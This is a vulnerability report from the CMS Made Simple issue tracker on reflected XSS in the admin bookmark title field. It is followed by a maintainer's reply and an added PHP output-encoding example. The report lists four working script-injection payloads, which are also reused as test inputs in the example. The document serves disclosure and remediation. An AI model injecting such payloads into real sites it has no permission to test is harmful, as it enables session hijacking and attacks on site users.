CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12432] Reflected XSS in /admin/addbookmark.php

Created By: Humberto Junior (halencarjunior)
Date Submitted: Thu Mar 18 11:22:38 -0400 2021

Assigned To: CMS Made Simple Foundation (cmsmsfoundation)
Version: 2.2.15
CMSMS Version: 2.2.15
Severity: Minor
Resolution: Accepted
State: Open
Summary:
Reflected XSS in /admin/addbookmark.php
Detailed Description:
If you log in to the Admin panel and go to My Preferences, you could exploit XSS in
the title field.

Some payloads that work:

"><script>prompt(1)</script><"
"><script>alert(1)</script><"
63311';alert(1)//812
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


History

Comments
Date: 2021-03-18 12:08
Posted By: Matt Hornsby (DIGI3) (DIGI3)

Please see
https://www.cmsmadesimple.org/community/get-involved/report-a-vulnerability for
details regarding exploits requiring admin access
      
Date: 2021-03-18 12:11
Posted By: Humberto Junior (halencarjunior)

This is still a vulnerability that could be exploited.

Just sanitize the field to be more secure.
      
Date: 2021-03-18 12:16
Posted By: Humberto Junior (halencarjunior)

And it is not different from CVE-2019-17226
      
Date: 2021-03-22 14:34
Posted By: Matt Hornsby (DIGI3) (DIGI3)

The link referenced mentions we do plan to clean this up as time permits, but it
isn't a high priority for the reasons outlined.
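
Added example, not part of the original thread and not CMS Made Simple code: one way to encode the reflected title value at output time, with the payloads from the report as regression inputs. The helper names esc_html and esc_js are hypothetical, and because the page does not show where the title is reflected, the example assumes two contexts, an HTML attribute and an inline script string (PHP 7.3 or later).

```php
<?php
// Added example: hypothetical helpers, not code from CMS Made Simple.

// Encode a value for an HTML attribute or element body.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode a value as a JavaScript string literal for an inline <script> block.
function esc_js(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Return true if none of the given raw characters survive in $encoded.
function is_clean(string $encoded, array $chars): bool
{
    foreach ($chars as $ch) {
        if (strpos($encoded, $ch) !== false) {
            return false;
        }
    }
    return true;
}

// Payloads quoted in the report, reused here as regression inputs.
$payloads = [
    '"><script>prompt(1)</script><"',
    '"><script>alert(1)</script><"',
    "63311';alert(1)//812",
    '//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>',
];

foreach ($payloads as $title) {
    $attr = esc_html($title);
    $js   = esc_js($title);
    // Strip the delimiting double quotes before checking the JS literal body.
    $jsBody = substr($js, 1, -1);

    if (!is_clean($attr, ['<', '>', '"', "'"])
        || !is_clean($jsBody, ['<', '>', '"', "'", '&'])) {
        throw new RuntimeException('encoding left a raw metacharacter');
    }
    echo '<input type="text" name="title" value="', $attr, '">', PHP_EOL;
    echo '<script>var title = ', $js, ';</script>', PHP_EOL;
}
```

Encoding is applied where the value is written into the page, per context, rather than by filtering the input on submission.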
      
Updates

Updated: 2021-03-22 14:34
resolution_id: 8 => 6

Updated: 2021-03-22 12:07
severity_id: 2 => 3

Updated: 2021-03-19 07:59
severity_id: 12 => 2

Updated: 2021-03-19 07:59
resolution_id: 9 => 8

Updated: 2021-03-18 12:08
resolution_id: => 9
severity_id: 2 => 12